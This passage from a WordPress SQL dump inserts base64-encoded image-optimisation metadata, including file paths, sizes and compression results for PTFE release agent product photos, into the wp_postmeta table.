UweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN4ZC1wdGZlLXJlbGVhc2UtYWdlbnQtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xNDN4ZC1wdGZlLXJlbGVhc2UtYWdlbnQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAwNDEsImlkIjoxNDQ0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE0M3hkLXB0ZmUtcmVsZWFzZS1hZ2VudC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE0M3hkLXB0ZmUtcmVsZWFzZS1hZ2VudC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTE0M3hkLXB0ZmUtcmVsZWFzZS1hZ2VudC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDA0MywiaWQiOjE0NDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzeGQtcHRmZS1yZWxlYXNlLWFnZW50LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzeGQtcHRmZS1yZWxlYXNlLWFnZW50LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTQzeGQtcHRmZS1yZWxlYXNlLWFnZW50LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMDQ2LCJpZCI6MTQ0NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN4ZC1wdGZlLXJlbGVhc2UtYWdlbnQtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN4ZC1wdGZlLXJlbGVhc2UtYWdlbnQtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xNDN4ZC1wdGZlLXJlbGVhc2UtYWdlbnQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAwNDksImlkIjoxNDQ0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzeGQtcHRmZS1yZWxlYXNlLWFnZW50LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzeGQtcHRmZS1yZWxlYXNlLWFnZW50LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTQzeGQtcHRmZS1yZWxlYXNlLWFnZW50LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo1OSwidGltZSI6MTQ4MzU3MDA1MSwiaWQiOjE0NDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN4ZC1wdGZlLXJlbGVhc2UtYWdlbnQtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN4ZC1wdGZlLXJlbGVhc2UtYWdlbnQtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xNDN4ZC1wdGZlLXJlbGVhc2UtYWdlbnQtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAwNTQsImlkIjoxNDQ0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzeGQtcHRmZS1yZWxlYXNlLWFnZW50LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzeGQtcHRmZS1yZWxlYXNlLWFnZW50LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTQzeGQtcHRmZS1yZWxlYXNlLWFnZW50LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMDU3LCJpZCI6MTQ0NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE0M3hkLXB0ZmUtcmVsZWFzZS1hZ2VudC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE0M3hkLXB0ZmUtcmVsZWFzZS1hZ2VudC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTE0M3hkLXB0ZmUtcmVsZWFzZS1hZ2VudC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDA1OSwiaWQiOjE0NDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN4ZC1wdGZlLXJlbGVhc2UtYWdlbnQtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN4ZC1wdGZlLXJlbGVhc2UtYWdlbnQtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xNDN4ZC1wdGZlLXJlbGVhc2UtYWdlbnQtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAwNjIsImlkIjoxNDQ0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzeGQtcHRmZS1yZWxlYXNlLWFnZW50LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzeGQtcHRmZS1yZWxlYXNlLWFnZW50LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTQzeGQtcHRmZS1yZWxlYXNlLWFnZW50LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMDY1LCJpZCI6MTQ0NH1d'); 
INSERT INTO `wp_postmeta` VALUES (29468, 1443, 'wpfc_optimisation_reduction', '2201587'); 
INSERT INTO `wp_postmeta` VALUES (29469, 1443, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzdGUtcHRmZS1yZWxlYXNlLWFnZW50LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzdGUtcHRmZS1yZWxlYXNlLWFnZW50LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xNDN0ZS1wdGZlLXJlbGVhc2UtYWdlbnQuanBnIiwicmVkdWN0aW9uIjoyMjAxNTIzLCJ0aW1lIjoxNDgzNTcwMDc2LCJpZCI6IjE0NDMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE0M3RlLXB0ZmUtcmVsZWFzZS1hZ2VudC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE0M3RlLXB0ZmUtcmVsZWFzZS1hZ2VudC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTE0M3RlLXB0ZmUtcmVsZWFzZS1hZ2VudC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDA3OSwiaWQiOjE0NDN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzdGUtcHRmZS1yZWxlYXNlLWFnZW50LTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzdGUtcHRmZS1yZWxlYXNlLWFnZW50LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTQzdGUtcHRmZS1yZWxlYXNlLWFnZW50LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMDgyLCJpZCI6MTQ0M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN0ZS1wdGZlLXJlbGVhc2UtYWdlbnQtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN0ZS1wdGZlLXJlbGVhc2UtYWdlbnQtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xNDN0ZS1wdGZlLXJlbGVhc2UtYWdlbnQtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAwODUsImlkIjoxNDQzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE0M3RlLXB0ZmUtcmVsZWFzZS1hZ2VudC0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN0ZS1wdGZlLXJlbGVhc2UtYWdlbnQtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTE0M3RlLXB0ZmUtcmVsZWFzZS1hZ2VudC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMDg5LCJpZCI6MTQ0M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN0ZS1wdGZlLXJlbGVhc2UtYWdlbnQtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN0ZS1wdGZlLXJlbGVhc2UtYWdlbnQtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xNDN0ZS1wdGZlLXJlbGVhc2UtYWdlbnQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAwOTIsImlkIjoxNDQzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE0M3RlLXB0ZmUtcmVsZWFzZS1hZ2VudC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE0M3RlLXB0ZmUtcmVsZWFzZS1hZ2VudC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTE0M3RlLXB0ZmUtcmVsZWFzZS1hZ2VudC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDA5NCwiaWQiOjE0NDN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzdGUtcHRmZS1yZWxlYXNlLWFnZW50LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzdGUtcHRmZS1yZWxlYXNlLWFnZW50LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTQzdGUtcHRmZS1yZWxlYXNlLWFnZW50LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMDk3LCJpZCI6MTQ0M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN0ZS1wdGZlLXJlbGVhc2UtYWdlbnQtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN0ZS1wdGZlLXJlbGVhc2UtYWdlbnQtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xNDN0ZS1wdGZlLXJlbGVhc2UtYWdlbnQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAxMDAsImlkIjoxNDQzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzdGUtcHRmZS1yZWxlYXNlLWFnZW50LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzdGUtcHRmZS1yZWxlYXNlLWFnZW50LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTQzdGUtcHRmZS1yZWxlYXNlLWFnZW50LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo1MSwidGltZSI6MTQ4MzU3MDEwMiwiaWQiOjE0NDN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN0ZS1wdGZlLXJlbGVhc2UtYWdlbnQtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN0ZS1wdGZlLXJlbGVhc2UtYWdlbnQtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xNDN0ZS1wdGZlLXJlbGVhc2UtYWdlbnQtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAxMDUsImlkIjoxNDQzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzdGUtcHRmZS1yZWxlYXNlLWFnZW50LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzdGUtcHRmZS1yZWxlYXNlLWFnZW50LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTQzdGUtcHRmZS1yZWxlYXNlLWFnZW50LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMTA4LCJpZCI6MTQ0M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE0M3RlLXB0ZmUtcmVsZWFzZS1hZ2VudC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTE0M3RlLXB0ZmUtcmVsZWFzZS1hZ2VudC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTE0M3RlLXB0ZmUtcmVsZWFzZS1hZ2VudC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDExMCwiaWQiOjE0NDN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN0ZS1wdGZlLXJlbGVhc2UtYWdlbnQtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0xNDN0ZS1wdGZlLXJlbGVhc2UtYWdlbnQtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0xNDN0ZS1wdGZlLXJlbGVhc2UtYWdlbnQtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAxMTMsImlkIjoxNDQzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzdGUtcHRmZS1yZWxlYXNlLWFnZW50LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMTQzdGUtcHRmZS1yZWxlYXNlLWFnZW50LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMTQzdGUtcHRmZS1yZWxlYXNlLWFnZW50LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMTE2LCJpZCI6MTQ0M31d'); 
INSERT INTO `wp_postmeta` VALUES (29470, 1442, 'wpfc_optimisation_reduction', '2528567'); 
